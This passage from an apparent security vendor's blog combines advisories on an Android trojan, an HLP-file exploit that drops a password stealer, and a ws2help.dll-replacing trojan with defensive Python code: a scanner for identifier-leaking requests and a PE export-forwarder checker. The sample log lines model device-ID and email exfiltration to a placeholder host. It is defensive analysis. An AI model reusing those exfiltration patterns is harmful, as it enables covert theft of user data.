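2012-01-10T09:13:10 10.0.0.9 GET http://example.invalid/search?q=490154203237518
2012-01-10T09:14:00 10.0.0.9 GET http://example.invalid/send.php?a_id=123456789012345&m_addr=x%40y.com
""".splitlines()

def scan_log(lines):
    """Return (client, url, identifiers) for each request matching the leak pattern."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 4 and is_exfil(parts[3]):
            hits.append((parts[1], parts[3], classify_query(parts[3])))
    return hits

if __name__ == "__main__":
    for client, url, ids in scan_log(SAMPLE_LOG):
        print(client, ids, url)
```

The same classify_query() can be pointed at POST bodies of type application/x-www-form-urlencoded; the one thing it cannot see is a leak sent over HTTPS, which is why the permission list (INTERNET plus GET_ACCOUNTS) is still the first thing to look at in the APK itself.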







3. How to prevent

This kind of malicious application initially targeted Russia and China, but it is now spreading worldwide. To use smartphones safely despite such malicious applications, we recommend the following "Smartphone security management tips" for general users.


Smartphone security management tips

1. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection on.
2. Download only applications that many other users have already verified.
3. Check downloaded applications with mobile anti-virus software before using them.
4. Do not visit suspicious or unknown sites from the smartphone.
5. Try not to open MMS, text messages or e-mail from unknown senders.
6. Always set a strong password on the smartphone.
7. Turn on wireless interfaces such as Bluetooth only while they are in use.
8. Do not store important information on the phone.
9. Do not modify the phone in unsupported ways such as rooting or jailbreaking.

INCA Internet (Security Response Center / Emergency Response Team) provides detection and removal of mobile malicious files such as the one above through "nProtect Mobile for Android" and operates a response system against various security threats.

Diagnosis name
- Trojan/Android.Jporn.A

1/03/2012

[Warning] Malicious file is spreading through HLP file's exploit.

1. Information

INCA Internet Security Response Center's Emergency Response Team has detected a malicious file that uses an HLP (Windows Help file) exploit.
Unlike executables (EXE, SCR) or document files (HWP, DOC, PPT, XLS, PDF), HLP exploits are uncommon.
Spreading malicious files through e-mail has been widely used.
Some clever distributors in particular use zero-day exploits or social engineering.



Using exploits for Microsoft OS/applications, Flash Player, and Java, attackers try to compromise well-known web sites. Malicious file distribution is increasingly a form of sophisticated psychological warfare.

[Warning] Malicious file masqueraded as a picture of Kim Jong Il's sister
http://en-erteam.nprotect.com/2011/12/warning-malicious-file-masqueraded-as.html

[Information] Continuous appearances of malicious file with using HWP exploit
http://en-erteam.nprotect.com/2011/11/information-continuous-appearance-of.html

2. HLP file exploit case

The following e-mail was reported as sent on December 29, 2011; it induces the user to open its attachment.


The attachment "Call for Application at fundation.rar" contains the help file "Call for Applications at fundation.hlp".


When the attachment is opened, it launches Windows Help and shows garbled characters and a link (http://www.molihua.org).


The malicious file is coded to create and execute A.VBS (the Visual Basic Script at line 7 in the capture) through a WScript.Shell command. So while the user is looking at the help page, the PC is infected by the malicious script code.


When A.VBS runs, it creates setup.exe, which acts as the root dropper, creates a "360" folder under the Application Data folder and installs "Live360.exe" there. A.VBS and setup.exe are then deleted.


Live360.exe's icon is disguised as a Microsoft Word document. When executed, it connects to a host in Shanghai (China) and receives Command and Control (C&C) through winlogon.exe.

At the time of analysis, the malicious file additionally dropped PASS.exe, which tries to steal personal information, including e-mail accounts saved in cache files.


Collected passwords are written to C:\Windows\System\xhyj.htm with Resource, Type, Account and Password columns and then sent to an external server.


3. How to prevent

To use your PC safely despite these malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications on the latest security updates.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection on.
3. Do not open or download attachments from suspicious e-mails.
4. Be careful with links received via instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.

1/02/2012

[Warning] Malicious file which changes ws2help.dll(System file)

1. Information

Since Jan 1, 2012, INCA Internet Security Response Center's Emergency Response Team has been detecting a malicious file that replaces ws2help.dll. Attackers keep distributing new malicious files, especially on weekends, to steal online game users' accounts. The file replaces a normal system file with a malicious one and disrupts some anti-virus products.
It is also delivered through Flash Player and Java exploits, so users need to be careful when using the internet and must keep those products on the latest security updates.


Various "patched" type malicious files, which replace core Windows system files, are spreading in South Korea; replacing ws2help.dll is the most common.

INCA Internet Security Response Center's Emergency Response Team detected such a file, which replaces ws2help.dll, on internet news and file-sharing sites.

[Warning] An error occurred on booting while being infected tampering system files.
http://en-erteam.nprotect.com/2011/07/caution-error-occurred-on-booting-while.html

[Warning] A malicious file masqueraded as a Melon player is spreading.
http://en-erteam.nprotect.com/2011/06/warning-malicious-file-masqueraded-as.html

[Warning] Variant malicious files changing Windows system files are increasing
http://en-erteam.nprotect.com/2011/06/warning-variant-malicious-files.html

[Warning] Spreads various malicious file with being tampered Korean social commerce web site
http://en-erteam.nprotect.com/2011/06/warning-spreads-various-malicious-file.html


Since INCA Internet Security Response Center added a "GD (Generic Detection)" function to our products to identify the many variants of this malicious file, our customers are protected from variants even without the latest pattern update.

◎ Trojan/W32.Forwarded.Gen

Malware distributors keep modifying their files to evade anti-virus detection; INCA Internet Security Response Center keeps pace with that trend.

2. Spreading path and symptoms of infection

The earlier malicious file we detected in February and March 2011 replaced the normal imm32.dll with a malicious one that passed every call through to the functions of the original system file.
Another type loaded the renamed original file through Push -> Call sequences in its export functions.

As in these examples, patching system DLLs is prevalent, and some of the malicious files raise unexpected exceptions in their anti-debugging code, which can end in a BSOD.

The following figure shows how the malicious ws2help.dll forwards its Export Address Table entries to ws3help.dll.


When cleaning a malicious ws2help.dll, anti-virus software must restore the original system file on reboot.
If it deletes the malicious file without putting the original back, the system will malfunction.
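This post and the version.dll post above describe the same trick: the replacement DLL keeps the system working by forwarding its exports to the renamed original (ws3help.dll here, version32.dll there), so a quick way to triage a suspect system DLL is to list where its exports forward to. The parser below is an added example, not the ERT's tooling: it reads a PE export table and reports forwarders (an export whose "address" points back inside the export directory is a forwarder string such as version32.VerQueryValueW), and flags any forward target outside an allow list. The build_forwarding_dll() helper constructs a minimal PE purely so the example has something to run on offline; the names it uses are examples, not samples from the posts.

```python
import struct

def _sections(data, pe_off, nsec, opt_size):
    """Section table entries as (virtual_address, size, raw_offset)."""
    base = pe_off + 4 + 20 + opt_size
    secs = []
    for i in range(nsec):
        _name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, base + 40 * i)
        secs.append((va, max(vsize, rawsize), rawptr))
    return secs

def _rva_to_off(secs, rva):
    for va, size, rawptr in secs:
        if va <= rva < va + size:
            return rawptr + (rva - va)
    raise ValueError("RVA 0x%x is not backed by any section" % rva)

def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")

def list_exports(data):
    """Return [(name, ordinal, forwarder)] for every export; forwarder is None for real code."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt = pe_off + 24
    magic = struct.unpack_from("<H", data, opt)[0]            # 0x10B = PE32, 0x20B = PE32+
    exp_rva, exp_size = struct.unpack_from("<II", data, opt + (96 if magic == 0x10B else 112))
    if exp_rva == 0:
        return []
    secs = _sections(data, pe_off, nsec, opt_size)
    e = _rva_to_off(secs, exp_rva)
    base, nfunc, nnames, fn_rva, names_rva, ords_rva = struct.unpack_from("<IIIIII", data, e + 16)
    fn_off, names_off, ords_off = (_rva_to_off(secs, r) for r in (fn_rva, names_rva, ords_rva))
    names = {}
    for i in range(nnames):
        idx = struct.unpack_from("<H", data, ords_off + 2 * i)[0]
        names[idx] = _cstr(data, _rva_to_off(secs, struct.unpack_from("<I", data, names_off + 4 * i)[0]))
    exports = []
    for i in range(nfunc):
        rva = struct.unpack_from("<I", data, fn_off + 4 * i)[0]
        if rva == 0:
            continue
        # An "address" that lands inside the export directory is a forwarder string, not code.
        fwd = _cstr(data, _rva_to_off(secs, rva)) if exp_rva <= rva < exp_rva + exp_size else None
        exports.append((names.get(i, "#%d" % (base + i)), base + i, fwd))
    return exports

def forward_targets(data):
    """Lower-cased module names that this DLL's exports forward to."""
    return {fwd.split(".", 1)[0].lower() for _, _, fwd in list_exports(data) if fwd}

def looks_like_patched_system_dll(data, expected_forwarders=()):
    """True if any export forwards to a module outside the allow list (e.g. version32, ws3help)."""
    allowed = {m.lower() for m in expected_forwarders}
    return any(m not in allowed for m in forward_targets(data))

def build_forwarding_dll(forwards):
    """Construct a minimal PE32 DLL whose exports are all forwarders (example input only)."""
    names = sorted(forwards)
    n, sec_rva, sec_off = len(names), 0x1000, 0x200
    fn_tab, name_tab = 40, 40 + 4 * n
    ord_tab, str_off = name_tab + 4 * n, name_tab + 6 * n
    strings, name_rvas, fwd_rvas = b"", [], []
    for nm in names:
        name_rvas.append(sec_rva + str_off + len(strings)); strings += nm.encode() + b"\0"
        fwd_rvas.append(sec_rva + str_off + len(strings)); strings += forwards[nm].encode() + b"\0"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, 0, 1, n, n,
                       sec_rva + fn_tab, sec_rva + name_tab, sec_rva + ord_tab)
    body += b"".join(struct.pack("<I", r) for r in fwd_rvas)
    body += b"".join(struct.pack("<I", r) for r in name_rvas)
    body += b"".join(struct.pack("<H", i) for i in range(n)) + strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94 + struct.pack("<II", sec_rva, len(body)) + b"\0" * 120
    sec = struct.pack("<8sIIIIIIHHI", b".edata", len(body), sec_rva, len(body), sec_off, 0, 0, 0, 0, 0x40000040)
    hdr = dos + coff + opt + sec
    return hdr + b"\0" * (sec_off - len(hdr)) + body

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            data = f.read()
        print(path, "forwards to:", sorted(forward_targets(data)) or "nothing")
```

Genuine system DLLs do forward, typically to ntdll, kernel32/kernelbase or api-ms-win-* modules, so compare against a copy from a clean machine of the same build rather than treating any forwarder as malicious; a forward to a module name that does not exist on a clean install, like version32 or ws3help, is the signal.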

These malicious files are spreading through news sites, file-sharing sites, social commerce sites, and forums, especially on weekends.

Java exploits in particular are prevalent these days, so users need to apply the latest updates.

3. How to prevent

We have mentioned various damage cases, such as theft of online game account information and unexpected IE crashes.

To protect against these threats, nProtect products detect them from pattern version "2011-06-23.01" onward with the generic diagnosis/treatment technique.

The following URLs are the official web sites of each product.


To use your PC safely despite these malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

※ Security management tips

1. Keep the OS and applications on the latest security updates.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection "ON".
3. Do not open or download attachments from suspicious e-mails.
4. Be careful with links received via instant messenger and SNS.

※ INCA Internet (Security Response Center / Emergency Response Team) provides generic diagnosis/treatment and operates a response system against various security threats.